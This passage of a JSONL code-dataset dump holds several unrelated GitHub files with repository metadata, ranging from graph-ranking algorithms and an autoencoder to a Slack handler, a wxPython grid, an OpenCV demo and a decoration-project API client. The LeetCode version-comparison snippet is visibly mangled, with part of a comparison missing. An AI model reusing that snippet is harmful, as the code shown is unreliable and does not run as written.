plt.show()","repo_name":"phoopies/DesdeoInterface","sub_path":"obsolete/physical_interfaces/NimbusInterface.py","file_name":"NimbusInterface.py","file_ext":"py","file_size_in_byte":12029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38255988638","text":"class Solution(object):\n def compareVersion(self, version1, version2):\n \"\"\"\n :type version1: str\n :type version2: str\n :rtype: int\n \"\"\"\n as_stack = lambda x:map(int, x.split('.'))\n stack1, stack2 = map(as_stack, (version1, version2))\n get_v = lambda l,idx: l[idx] if idxv2: return 1\n if v2>v1: return -1\n return 0\n","repo_name":"dborzov/leetcode","sub_path":"165-compare-version-numbers.py","file_name":"165-compare-version-numbers.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38588728191","text":"import numpy as np\nimport random\n\n# Version of regular python enumerate with a step parameter\ndef enumerate2(xs, start=0, step=1):\n i = start\n for count in range(len(xs)):\n try:\n yield (count, xs[i])\n except:\n break\n i += step\n\n\n#########################################\n##### Augmentation kwarg generators #####\n#########################################\ndef get_rotation_kwargs(epoch, epochs_per_aug):\n scalar = float(180) / epochs_per_aug\n min_rotation = (epoch - 1) * scalar\n max_rotation = epoch * scalar\n rotation_sample = random.choice([-1, 1]) * random.uniform(min_rotation, max_rotation)\n return {'angle': rotation_sample}\n\ndef get_blur_kwargs(epoch, epochs_per_aug):\n if epoch < 3:\n epoch += 2 # Size 1 kernel does nothing, so add 2 to get size 3 kernel\n if epoch % 2 == 1:\n return {'kernel_size': epoch}\n\n # Use half the default std. dev. and keep kernel same size as last time\n sigma = (0.3 * ((epoch) * 0.5 - 1) + 0.8) / 2\n return {'kernel_size': epoch - 1, 'sigma': sigma}\n\ndef get_gamma_kwargs(epoch, epochs_per_aug):\n return {'gamma': epoch}\n\ndef get_crop_kwargs(epoch, epochs_per_aug):\n return {'output_size': 32 - 2 * epoch}\n\n","repo_name":"Andrew-Draganov/augmentation_dimensionality","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33988994971","text":"from graph import graph\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom pprint import PrettyPrinter\n\n\ndef hits(graph, min_diff=0.01):\n nodes = graph.nodes()\n auth = dict.fromkeys(nodes, 1)\n hub = dict.fromkeys(nodes, 1)\n iteration = 0\n\n while True:\n iteration += 1\n prev_auth = auth.copy()\n prev_hub = hub.copy()\n\n for node in nodes:\n auth[node] = sum(prev_hub.get(parent, 0) for parent in graph.parents(node))\n hub[node] = sum(prev_auth.get(child, 0) for child in graph.childrens(node))\n\n norm_auth = sum(auth.values())\n norm_hub = sum(hub.values())\n auth = {key: val / norm_auth for key, val in auth.items()}\n hub = {key: val / norm_hub for key, val in hub.items()}\n\n diff = sum((abs(prev_hub[k] - hub[k]) for k in hub)) + sum((abs(prev_auth[k] - auth[k]) for k in auth))\n if diff <= min_diff:\n break\n\n return auth, hub, iteration\n\n\ndef pagerank(graph, min_diff=0.0001, damping_factor=0.15):\n nodes = graph.nodes()\n pagerank = dict.fromkeys(nodes, 1.0 / len(nodes))\n iteration = 0\n\n while True:\n iteration += 1\n diff = 0\n\n for node in nodes:\n rank = (1.0 - damping_factor) / len(nodes)\n for parent in graph.parents(node):\n rank += damping_factor * pagerank[parent] / len(graph.childrens(parent))\n\n diff += abs(pagerank[node] - rank)\n pagerank[node] = rank\n\n if diff <= min_diff:\n break\n\n return pagerank, iteration\n\n\ndef simrank(graph, min_diff=0.01, decay_factor=0.8):\n nodes = graph.nodes()\n sim = np.identity(len(nodes))\n iteration = 0\n\n while True:\n iteration += 1\n prev_sim = np.copy(sim)\n\n for idx_u, u in enumerate(nodes):\n for idx_v, v in enumerate(nodes):\n if u is v:\n continue\n\n len_up = len(graph.parents(u))\n len_vp = len(graph.parents(v))\n if len_up == 0 or len_vp == 0:\n sim[idx_u][idx_v] = 0\n else:\n sum = 0\n for u_p in graph.parents(u):\n for v_p in graph.parents(v):\n sum += prev_sim[nodes.index(u_p)][nodes.index(v_p)]\n \n sim[idx_u][idx_v] = (decay_factor / (len_up * len_vp)) * sum\n\n if np.allclose(sim, prev_sim, atol=min_diff):\n break\n\n return sim, iteration\n\n\nif __name__ == '__main__':\n\n graphs = list()\n for i in range(1, 8):\n from graph import graph\n filename = 'hw3dataset/graph_{}.txt'.format(i)\n graph = graph()\n graph.read_from_file(filename)\n graphs.append(graph)\n\n\n for idx, graph in enumerate(graphs, 1):\n filename = './result/hits/graph_{}.txt'.format(idx)\n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n a, h, i = hits(graph)\n f.write('Run {} iterations \\nhub:\\n'.format(i))\n pp.pprint(h)\n f.write('auth:\\n')\n pp.pprint(a)\n print('(hits) graph_{}.txt saved'.format(idx))\n\n for idx, graph in enumerate(graphs, 1):\n filename = './result/pagerank/graph_{}.txt'.format(idx)\n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n pr, i = pagerank(graph)\n f.write('Run {} iterations \\nPage Rank:\\n'.format(i))\n pp.pprint(pr)\n print('(pagerank) graph_{}.txt saved'.format(idx))\n\n for idx, graph in enumerate(graphs, 1):\n if idx == 6:\n break\n\n filename = './result/simrank/graph_{}.txt'.format(idx) \n with open(filename, 'w+') as f:\n pp = PrettyPrinter(indent=4, stream=f)\n f.write('\\nGraph {}\\n'.format(idx))\n s, i = simrank(graph)\n f.write('Run {} iterations \\nSimRank:\\n'.format(i))\n pp.pprint(s)\n print('(simrank) graph_{}.txt saved'.format(idx))\n\n print('end')\n","repo_name":"klin0816/data_mining_project3","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11488549154","text":"# %% [markdown]\n# # Dependencies\n\n# %%\n\nimport argparse\nimport logging\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport yaml\n\n\nlogger = logging.getLogger(__name__)\nsns.set_theme(style=\"whitegrid\")\nsns.set_context(\"paper\", font_scale=1.5)\n\n\ndef cat_plot(\n data,\n x,\n y,\n hue,\n kind,\n titles,\n xlabels,\n ylabels,\n legend_title,\n file,\n set={},\n **kwargs,\n):\n plt.gcf().clear()\n graph = sns.catplot(data=data, x=x, y=y, hue=hue, kind=kind, **kwargs)\n graph.set_xlabels(xlabels)\n graph.set_ylabels(ylabels)\n graph.set_titles(titles)\n graph.legend.set_title(title=legend_title)\n graph.set(**set)\n graph.savefig(FOLDER / file)\n plt.gcf().clear()\n logger.info(f\"Saved graph to {FOLDER / file}\")\n\n\ndef line_plot(\n data,\n x,\n y,\n hue,\n xlabel,\n ylabel,\n title,\n file,\n y_scale=None,\n x_scale=None,\n legend={},\n control=None,\n control_color=None,\n):\n plt.gcf().clear()\n graph = sns.lineplot(data=data, x=x, y=y, hue=hue, style=control)\n if control is not None:\n assert control_color is not None, \"Please specify a control color\"\n graph.add_line(plt.axhline(y=control, color=control_color, linestyle=\"-\"))\n graph.set_xlabel(xlabel)\n graph.set_ylabel(ylabel)\n graph.set_title(title)\n graph.legend(**legend)\n if y_scale is not None:\n graph.set_yscale(y_scale)\n if x_scale is not None:\n graph.set_xscale(x_scale)\n graph.get_figure().tight_layout()\n graph.get_figure().savefig(FOLDER / file)\n plt.gcf().clear()\n return graph\n\n\ndef format_control_parameter(data, control_dict, min_max=True):\n data.def_gen.fillna(\"Control\", inplace=True)\n new_data = pd.DataFrame()\n for _, row in data.iterrows():\n if row.defence in [\"Control\", None, \"None\", \"none\", \"null\", np.nan]:\n row[\"def_param\"] = np.nan\n row[\"def_value\"] = np.nan\n else:\n param = control_dict[row.defence]\n row[\"def_param\"] = param.split(\".\")[-1]\n value = row[param]\n row[\"def_value\"] = value\n if row.attack in [\"Control\", None, \"None\", \"none\", \"null\", np.nan]:\n row[\"atk_param\"] = np.nan\n row[\"atk_value\"] = np.nan\n else:\n param = control_dict[row.attack]\n row[\"atk_param\"] = param.split(\".\")[-1]\n value = row[param]\n row[\"atk_value\"] = value\n new_data = pd.concat([new_data, row], axis=1)\n data = new_data.T\n data.def_value.fillna(0, inplace=True)\n del new_data\n\n if min_max is True:\n defs = data.def_gen.unique()\n atks = data.atk_gen.unique()\n # Min-max scaling of control parameters\n for def_ in defs:\n max_ = data[data.def_gen == def_].def_value.max()\n min_ = data[data.def_gen == def_].def_value.min()\n scaled_value = (data[data.def_gen == def_].def_value - min_) / (max_ - min_)\n data.loc[data.def_gen == def_, \"def_value\"] = scaled_value\n\n for atk in atks:\n max_ = data[data.atk_gen == atk].atk_value.max()\n min_ = data[data.atk_gen == atk].atk_value.min()\n scaled_value = (data[data.atk_gen == atk].atk_value - min_) / (max_ - min_)\n data.loc[data.atk_gen == atk, \"atk_value\"] = scaled_value\n return data\n\n\ndef clean_data_for_plotting(data, def_gen_dict, atk_gen_dict, control_dict):\n def_gen = data.def_gen.map(def_gen_dict)\n data.def_gen = def_gen\n atk_gen = data.atk_gen.map(atk_gen_dict)\n data.atk_gen = atk_gen\n # Drops poorly merged columns\n data = data[data.columns.drop(list(data.filter(regex=\".1\")))]\n data = data[data.columns.drop(list(data.filter(regex=\".1\")))]\n # Replaces model names with short names\n model_names = data[\"model.init.name\"]\n # model_names = [x.get_text() for x in model_names]\n model_names = [x.split(\".\")[-1] for x in model_names]\n data[\"model_name\"] = model_names\n # %%\n # Replace data.sample.random_state with random_state\n data[\"random_state\"] = data[\"data.sample.random_state\"].copy()\n del data[\"data.sample.random_state\"]\n data = format_control_parameter(data, control_dict, min_max=True)\n # Calculates various failure rates\n data[\"adv_failures_per_training_time\"] = (\n data[\"train_time_per_sample\"] / (1 - data[\"adv_accuracy\"]) * 100\n )\n data[\"adv_failure_rate\"] = (1 - data[\"adv_accuracy\"]) * data[\n \"adv_fit_time_per_sample\"\n ]\n data[\"failure_rate\"] = (1 - data[\"accuracy\"]) * data[\"predict_time_per_sample\"]\n data[\"failures_per_training_time\"] = (\n data[\"train_time_per_sample\"] / (1 - data[\"accuracy\"]) * 100\n )\n logger.info(f\"Saving data to {FOLDER / 'data.csv'}\")\n data.to_csv(FOLDER / \"data.csv\")\n return data\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-p\",\n \"--path\",\n type=str,\n help=\"Path to the plot folder\",\n default=\"output/plots\",\n )\n parser.add_argument(\n \"-f\",\n \"--file\",\n type=str,\n help=\"Path to the plot folder\",\n default=\"output/reports/results.csv\",\n )\n parser.add_argument(\n \"-t\",\n \"--plotfiletype\",\n type=str,\n help=\"Filetype of the plots\",\n default=\".pdf\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbosity\",\n default=\"INFO\",\n help=\"Increase output verbosity\",\n )\n args = parser.parse_args()\n logging.basicConfig(level=args.verbosity)\n # %%\n assert Path(\n args.file,\n ).exists(), f\"File {args.file} does not exist. Please specify a valid file using the -f flag.\"\n csv_file = args.file\n data = pd.read_csv(csv_file)\n if \"Unnamed: 0\" in data.columns:\n data.drop(\"Unnamed: 0\", axis=1, inplace=True)\n\n FOLDER = Path(Path(), args.path)\n IMAGE_FILETYPE = (\n args.plotfiletype\n if args.plotfiletype.startswith(\".\")\n else f\".{args.plotfiletype}\"\n )\n if Path(FOLDER).exists():\n pass\n else:\n logger.info(f\"Creating folder {FOLDER}\")\n FOLDER.mkdir(parents=True, exist_ok=True)\n\n # Reads Config file\n with open(FOLDER / \"config/default.yaml\", \"r\") as f:\n big_dict = yaml.load(f, Loader=yaml.FullLoader)\n def_gen_dict = big_dict[\"defences\"]\n atk_gen_dict = big_dict[\"attacks\"]\n control_dict = big_dict[\"params\"]\n\n data = clean_data_for_plotting(data, def_gen_dict, atk_gen_dict, control_dict)\n # %%\n cat_plot_list = big_dict[\"cat_plot\"]\n i = 0\n for dict_ in cat_plot_list:\n i += 1\n logger.info(f\"Rendering graph {i}\")\n locals()[f\"graph{i}\"] = cat_plot(data, **dict_)\n # %%\n line_plot_list = big_dict[\"line_plot\"]\n for dict_ in line_plot_list:\n i += 1\n logger.info(f\"Rendering graph {i}\")\n locals()[f\"graph{i}\"] = line_plot(data, **dict_)\n\n # %%\n graph14 = sns.scatterplot(\n data=data,\n x=\"train_time_per_sample\",\n y=\"adv_failure_rate\",\n hue=\"model_name\",\n )\n graph14.set_yscale(\"log\")\n graph14.set_xscale(\"log\")\n graph14.set_xlabel(\"Training Time\")\n graph14.set_ylabel(\"Adversarial Failure Rate\")\n graph14.legend(title=\"Model Name\")\n # graph6.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1)\n # graph6.legend(labels=[\"ResNet18\", \"Resnet34\", \"Resnet50\"])\n graph14.set_title(\"Adversarial Failure Rate vs Training Time\")\n # graph6.get_figure().tight_layout()\n file = f\"adv_failure_rate_vs_train_time{IMAGE_FILETYPE}\"\n graph14.get_figure().savefig(FOLDER / file)\n logger.info(f\"Rendering graph {i+1}\")\n logger.info(f\"Saved graph to {FOLDER / file}\")\n plt.gcf().clear()\n conf_path = Path(\"output/plots/config\")\n conf_path.mkdir(parents=True, exist_ok=True)\n conf_dict = {\n **vars(args),\n \"cat_plot\": cat_plot_list,\n \"line_plot\": line_plot_list,\n \"params\": control_dict,\n \"attacks\": atk_gen_dict,\n \"defences\": def_gen_dict,\n }\n with open(conf_path / \"default.yaml\", \"w\") as f:\n yaml.dump(conf_dict, f)\n","repo_name":"simplymathematics/deckard","sub_path":"examples/pytorch/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":8199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"8759070790","text":"\"\"\"autoencoder.py\n\nAuthor(s): chofer, rkwitt (2018)\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport core.mynn as mynn\n\n\nclass DCGEncDec(nn.Module):\n \"\"\"\n Implementation of a convolutional autoencoder with a DCGAN-style\n encoder (disc. in DCGAN) and decoder. \n\n Args:\n filter_config: list \n Number of channels input to each conv. layer. The length of\n the list determines the number of layers. The filters in \n each layer are 3x3 spatially with a step-size of two.\n\n input_config: list\n List of input img. dimensions in the form channel x width x height.\n\n latent_config: dict\n Specification of the latent space geometry. \n\n Keys: \n\n n_branchces: int \n number of independent branches in the latent space - Needs\n to be a divisor of the dimensionality of the last conv. \n layer when flattened.\n\n out_features_branch: int\n number of output features for each independent branch. \n\n Example::\n m = DCGEncDec(\n filter_config = [3,16,32,64], \n input_config = [3,32,32],\n latent_config = {n_branches: 16, 'out_features_branch': 10}\n )\n This creates an autoencoder for input images of size 3x32x32 with\n 3 input channels (obviously) and three conv. layers with 16,32 and\n 64 filters (each followed by leaky ReLU activations). The decoder \n mirrors this architecture with convolutional transpose filters. \n\n In the latent space, this model has 16 branches\n that output 10 dimensional features. For decoding, these features\n are concatenated. In this particular example, flattening the output \n of the last conv. layer results in a 1024-dim. representation.\n \"\"\"\n def __init__(self, *ignore,\n filter_config=[3,16,32,64], \n input_config=[3,32,32], \n latent_config={'n_branches': 1, 'out_features_branch': 10}):\n super().__init__()\n \n assert len(ignore) == 0, \"Keyword args only!\"\n\n self.n_branches = latent_config['n_branches']\n self.out_features_branch = latent_config['out_features_branch']\n \n assert(filter_config[0]==input_config[0])\n \n self.enc = []\n for i in range(len(filter_config)-1):\n self.enc.append(\n nn.Conv2d(in_channels = filter_config[i], \n out_channels = filter_config[i+1], \n kernel_size = 3, \n stride = 2, \n padding = 1, \n bias = True)\n )\n \n self.enc.append(nn.LeakyReLU())\n \n self.enc_conv = nn.Sequential(*self.enc)\n\n # Compute the required size of the linear layer following the last conv. stage\n enc_dim = torch.tensor(list(self.enc_conv(torch.randn(10,*input_config)).size()[1:]))\n assert enc_dim.prod() % self.n_branches == 0\n \n # Make sure we have independent branches - this effectively multiplies the \n # weight matrix of the linear layer by a mask which ensures this property.\n self.enc_fc = mynn.IndependentBranchesLinear(\n enc_dim.prod(), \n self.out_features_branch,\n self.n_branches\n )\n \n # Create a linear view\n self.enc = nn.Sequential(\n self.enc_conv, \n mynn.LinearView(),\n self.enc_fc\n )\n \n # Unfold the independent linear branches \n self.dec_fc = mynn.IndependentBranchesLinear(\n self.latent_dim, \n int(enc_dim.prod()/self.n_branches), \n self.n_branches\n )\n \n self.dec_convt = []\n self.dec_convt.append(mynn.View(tuple([-1] + list(enc_dim))))\n \n reversed_filter_config = list(reversed(filter_config))\n for i in range(len(reversed_filter_config)-1):\n self.dec_convt.append(\n nn.ConvTranspose2d(\n in_channels = reversed_filter_config[i],\n out_channels = reversed_filter_config[i+1], \n kernel_size = 3,\n stride = 2, \n padding = 1, \n output_padding = 1)\n )\n self.dec_convt.append(nn.ReLU())\n\n # remove last ReLU\n self.dec_convt = self.dec_convt[:-1]\n \n # At the moment we do not use a Sigmoid output\n self.dec_convt = nn.Sequential(*self.dec_convt)\n self.dec = nn.Sequential(self.dec_fc,\n self.dec_convt)\n \n \n def forward(self, input):\n z = self.enc(input)\n x = self.dec(z)\n return x,z\n \n @property\n def latent_dim(self):\n return self.n_branches*self.out_features_branch\n\n","repo_name":"c-hofer/COREL_icml2019","sub_path":"core/autoencoder.py","file_name":"autoencoder.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"34906247308","text":"import json\nfrom http import HTTPStatus\nfrom threading import Thread\n\nfrom flask import request, current_app\n\nfrom src.blueprints.slack.SlackResource import SlackResource\nfrom src.models.slack.requests.SlackInteractiveComponentRequest import InteractiveComponentRequestSchema, \\\n SlackInteractiveComponentRequest\nfrom src.translators.SlackInteractiveComponentTranslator import SlackInteractiveComponentTranslator\n\n\nclass InteractiveComponentResource(SlackResource):\n\n @SlackResource.authenticate\n def post(self):\n \"\"\"Receive an interactive component (e.g. menu, dialog box) payload\"\"\"\n self.logger.info(f'Processing InteractiveComponent request: {request.__dict__}')\n payload = json.loads(request.form['payload'])\n interactive_component_request: SlackInteractiveComponentRequest = InteractiveComponentRequestSchema().load(\n payload).data\n translator = SlackInteractiveComponentTranslator(\n slack_interactive_component_request=interactive_component_request,\n slack_client_wrapper=current_app.slack_client_wrapper,\n strand_api_client_wrapper=current_app.strand_api_client_wrapper\n )\n Thread(target=translator.translate, daemon=True).start()\n if interactive_component_request.is_dialog:\n # Slack wants a different response for dialogs\n return {}, HTTPStatus.OK\n return None, HTTPStatus.NO_CONTENT\n","repo_name":"tadasant/strand-slack","sub_path":"src/blueprints/slack/InteractiveComponentResource.py","file_name":"InteractiveComponentResource.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14425222150","text":"import wx\nimport wx.grid\nimport sys\nimport os\nimport copy\nfrom collections import namedtuple, OrderedDict\nimport numbers\nimport datetime\nfrom dateutil import tz\nimport regex as re\n\nfrom neumodvb.util import setup, lastdot\nfrom neumodvb.util import dtdebug, dterror\nfrom neumodvb import neumodbutils\nfrom neumodvb.neumolist import NeumoTable, NeumoGridBase, IconRenderer, MyColLabelRenderer, GridPopup, screen_if_t\nfrom neumodvb.neumo_dialogs import ShowMessage, ShowOkCancel\nfrom neumodvb.util import find_parent_prop\nimport pydevdb\nimport pychdb\n\nclass lnbnetwork_screen_t(object):\n def __init__(self, parent):\n self.parent = parent\n\n @property\n def list_size(self):\n return len(self.parent.lnb.networks)\n\n def record_at_row(self, rowno):\n assert(rowno>=0)\n if rowno >= self.list_size:\n assert(rowno == self.list_size)\n assert rowno < self.list_size\n return self.parent.lnb.networks[rowno]\n\n def update(self, txn):\n return True\n\n def set_reference(self, rec):\n lnb = self.parent.lnb\n for i in range(len(lnb.networks)):\n if lnb.networks[i].sat_pos == rec.sat_pos:\n return i\n return -1\n\nclass LnbNetworkTable(NeumoTable):\n CD = NeumoTable.CD\n bool_fn = NeumoTable.bool_fn\n all_columns = \\\n [CD(key='sat_pos', label='LNB Pos.', basic=True, dfn= lambda x: pychdb.sat_pos_str(x[1]),\n sfn = lambda x: x[2].sat_pos_sfn(x[0], x[1])),\n CD(key='priority', label='priority', basic=False),\n CD(key='usals_pos', label='Usals pos.', basic=False, allow_others=True,\n dfn= lambda x: pychdb.sat_pos_str(x[1]), sfn = lambda x: x[2].usals_pos_sfn(x[0], x[1])),\n CD(key='diseqc12', label='diseqc 1.2', basic=False),\n CD(key='enabled', label='enabled', basic=False, dfn=bool_fn),\n CD(key='ref_mux', label='ref mux', basic=False, readonly= True, example=\"28.2E: nid=1234 tid=1234\")\n ]\n\n def __init__(self, parent, basic=False, *args, **kwds):\n initial_sorted_column = 'sat_pos'\n data_table= pydevdb.lnb_network\n self.lnb_ = None\n self.changed = False\n super().__init__(*args, parent=parent, basic=basic, db_t=pydevdb, data_table = data_table,\n record_t=pydevdb.lnb_network.lnb_network,\n screen_getter = self.screen_getter,\n initial_sorted_column = initial_sorted_column,\n **kwds)\n def sat_pos_sfn(self, record, val):\n from neumodvb.util import parse_longitude\n newval = parse_longitude(val)\n record.sat_pos = newval\n changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n if changed:\n self.changed = True\n return record\n\n def usals_pos_sfn(self, record, val):\n from neumodvb.util import parse_longitude\n newval = parse_longitude(val)\n record.usals_pos = newval\n changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n if changed:\n self.changed = True\n return record\n\n @property\n def lnb(self):\n if self.lnb_ is None:\n self.lnb_ = find_parent_prop(self, 'lnb')\n return self.lnb_\n\n @property\n def network(self):\n if hasattr(self.parent, \"network\"):\n return self.parent.network\n return None\n\n @network.setter\n def network(self, val):\n if hasattr(self.parent, \"network\"):\n self.parent.network = val\n\n def InitialRecord(self):\n return self.network\n\n def SetSat(self, sat):\n if self.lnb is None:\n return self.network\n for network in self.lnb.networks:\n if network.sat_pos == sat.sat_pos:\n self.network = network\n return self.network\n\n def screen_getter(self, txn, sort_field):\n \"\"\"\n txn is not used; instead we use self.lnb\n \"\"\"\n self.screen = screen_if_t(lnbnetwork_screen_t(self), self.sort_order==2)\n\n def matching_sat(self, sat_pos):\n sats = wx.GetApp().get_sats()\n for sat in sats:\n if abs(sat.sat_pos - sat_pos) < 5:\n return sat\n return None\n\n def get_usals_location(self):\n receiver = wx.GetApp().receiver\n opts = receiver.get_options()\n return opts.usals_location\n\n def __save_record__(self, txn, record):\n dtdebug(f'NETWORKS: {len(self.lnb.networks)}')\n changed = pydevdb.lnb.add_or_edit_network(self.lnb, self.get_usals_location(), record)\n if changed:\n self.changed = True\n\n for n in self.lnb.networks:\n if self.matching_sat(n.sat_pos) is None:\n ss = pychdb.sat_pos_str(n.sat_pos)\n add = ShowOkCancel(\"Add satellite?\", f\"No sat yet for position={ss}; add one?\")\n if not add:\n return None\n sat = pychdb.sat.sat()\n sat.sat_pos = n.sat_pos;\n pychdb.put_record(txn, sat)\n return record\n\n def __delete_record__(self, txn, record):\n for i in range(len(self.lnb.networks)):\n if self.lnb.networks[i].sat_pos == record.sat_pos:\n self.lnb.networks.erase(i)\n self.changed = True\n return\n dtdebug(\"ERROR: cannot find record to delete\")\n self.changed = True\n\n def __new_record__(self):\n ret=self.record_t()\n return ret\n\nclass LnbNetworkGrid(NeumoGridBase):\n def _add_accels(self, items):\n accels=[]\n for a in items:\n randomId = wx.NewId()\n accels.append([a[0], a[1], randomId])\n self.Bind(wx.EVT_MENU, a[2], id=randomId)\n accel_tbl = wx.AcceleratorTable(accels)\n self.SetAcceleratorTable(accel_tbl)\n\n def __init__(self, basic, readonly, *args, **kwds):\n table = LnbNetworkTable(self, basic=basic)\n super().__init__(basic, readonly, table, *args, **kwds)\n self.sort_order = 0\n self.sort_column = None\n self.selected_row = None if self.table.GetNumberRows() == 0 else 0\n #todo: these accellerators should be copied from neumomenu\n self._add_accels([\n (wx.ACCEL_CTRL, ord('D'), self.OnDelete),\n (wx.ACCEL_CTRL, ord('N'), self.OnNew),\n (wx.ACCEL_CTRL, ord('E'), self.OnEditMode)\n ])\n self.EnableEditing(self.app.frame.edit_mode)\n\n def SetSat(self, sat):\n self.network = self.table.SetSat(sat)\n\n def OnDone(self, evt):\n #@todo(). When a new record has been inserted and network has been changed, and then user clicks \"done\"\n #this is not seen as a change, because the editor has not yet saved itself\n self.table.SaveModified() #fake save\n if self.table.changed:\n if len(self.table.lnb.networks) ==0:\n ShowMessage(title=_(\"Need at least one network per LNB\"),\n message=_(\"Each LNB needs at least one network. A default one has been added\"))\n dtdebug(f\"OnDone called changed-{self.table.changed}\")\n\n def OnKeyDown(self, evt):\n \"\"\"\n After editing, move cursor right\n \"\"\"\n keycode = evt.GetKeyCode()\n if keycode == wx.WXK_RETURN and not evt.HasAnyModifiers():\n self.MoveCursorRight(False)\n evt.Skip(False)\n else:\n evt.Skip(True)\n\n def CmdTune(self, evt):\n row = self.GetGridCursorRow()\n mux_key = self.screen.record_at_row(row).ref_mux\n txn = self.db.wtxn()\n mux = pychdb.dvbs_mux.find_by_key(txn, mux_key)\n txn.abort()\n del txn\n mux_name= f\"{int(mux.frequency/1000)}{lastdot(mux.pol).replace('POL','')}\"\n dtdebug(f'CmdTune requested for row={row}: PLAY mux={mux_name}')\n self.table.SaveModified()\n self.app.MuxTune(mux)\n\n def OnNew(self, evt):\n self.app.frame.SetEditMode(True)\n self.EnableEditing(self.app.frame.edit_mode)\n return super().OnNew(evt)\n\n def OnEditMode(self, evt):\n dtdebug(f'old_mode={self.app.frame.edit_mode}')\n self.app.frame.ToggleEditMode()\n self.EnableEditing(self.app.frame.edit_mode)\n\n def handle_lnb_change(self, lnb, network):\n self.table.GetRow.cache_clear()\n self.OnRefresh(None, network)\n if lnb_network is None:\n self.network = self.table.screen.record_at_row(0)\n else:\n self.network = network\n\nclass BasicLnbNetworkGrid(LnbNetworkGrid):\n def __init__(self, *args, **kwds):\n basic = True\n readonly = True\n super().__init__(basic, readonly, *args, **kwds)\n","repo_name":"deeptho/neumodvb","sub_path":"gui/neumodvb/lnbnetworklist.py","file_name":"lnbnetworklist.py","file_ext":"py","file_size_in_byte":8758,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"10825948434","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\nimg1 = np.zeros((324,324,3),np.uint8)\r\nimg1 = cv2.rectangle(img1,(200,0),(300,100),(255,255,255),-1)\r\nimg2 = cv2.imread('blackwhite.jpg')\r\n\r\n# bitAnd = cv2.bitwise_and(img2, img1)\r\n\r\n\r\n#thus when we will see the output of this we will know that by comparing img1 and img2 that black act as false and white act as true so by applying boolen knowledge we will get the third image on the basis of that\r\n#similarly we can do it for the OR, NOT and XOR\r\n\r\n\r\n#bitOR = cv2.bitwise_or(img2, img1)\r\n#bitNOT = cv2.bitwise_not(img2)\r\nbitXOR = cv2.bitwise_xor(img2, img1)\r\n\r\ncv2.imshow(\"img1\",img1)\r\ncv2.imshow(\"img2\",img2)\r\n# cv2.imshow(\"bitAnd\",bitAnd)\r\n# cv2.imshow('bitOr', bitOR)\r\ncv2.imshow('bitXOR', bitXOR)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"Soham7021/Basic_Open_CV_Repo","sub_path":"11th bitwise operations.py","file_name":"11th bitwise operations.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10205916881","text":"# -*- coding:utf8 -*-\n\nimport time\nfrom common import sqlbase, dict\nfrom common.base import consoleLog, get_conf\nfrom common.datetimes import addDays\nfrom common.interface_wfl import myRequest, upLoadPhoto\nfrom common.dict import UserInfo, get_dict_value\nfrom isz.infoClass import DecorationProjectInfo\n\n\nclass Decoration(DecorationProjectInfo):\n \"\"\"装修工程\"\"\"\n uploadPhotoURL = 'http://decorate.ishangzu.com/isz_decoration/DecorationFileController/uploadPhoto' # 装修工程上传图片地址\n user = UserInfo.getConfigUser()\n\n def placeOrder(self):\n \"\"\"下单\"\"\"\n consoleLog(u'开始工程管理')\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/placeOrder'\n data = {\n 'place_order_dep': self.user.dep_id,\n 'place_order_reason': u'测试',\n 'place_order_uid': self.user.user_id,\n 'place_order_uname': self.user.user_name,\n 'place_order_date': time.strftime('%Y-%m-%d %H:%M:%S'),\n 'predict_survey_date': '%s 09:00' % addDays(1),\n 'project_id': self.project_id\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'下单完成')\n return\n\n def dispatchOrder(self):\n \"\"\"派单\"\"\"\n url = 'http://decorate.ishangzu.com/isz_decoration/NewDecorationProjectController/changeProgress/dispatchOrder'\n data = {\n 'construct_uid': '1610',\n 'construct_uname': u'徐经纬',\n 'dispach_remark': u'测试派单',\n 'project_id': self.project_id,\n 'supplier_id': '8A2152435FBAEFC3015FBAEFC3000000',\n 'supplier_uid': '8AB398CA5FBAF072015FBB26338A0002',\n 'predict_survey_date': '',\n 'supplier_name': u'测试专用硬装供应商',\n 'supplier_uname': u'测试专用硬装员工'\n }\n result = myRequest(url, data)\n if result:\n consoleLog(u'派单完成')\n return\n\n def acceptOrder(self):\n \"\"\"接单\"\"\"\n url = 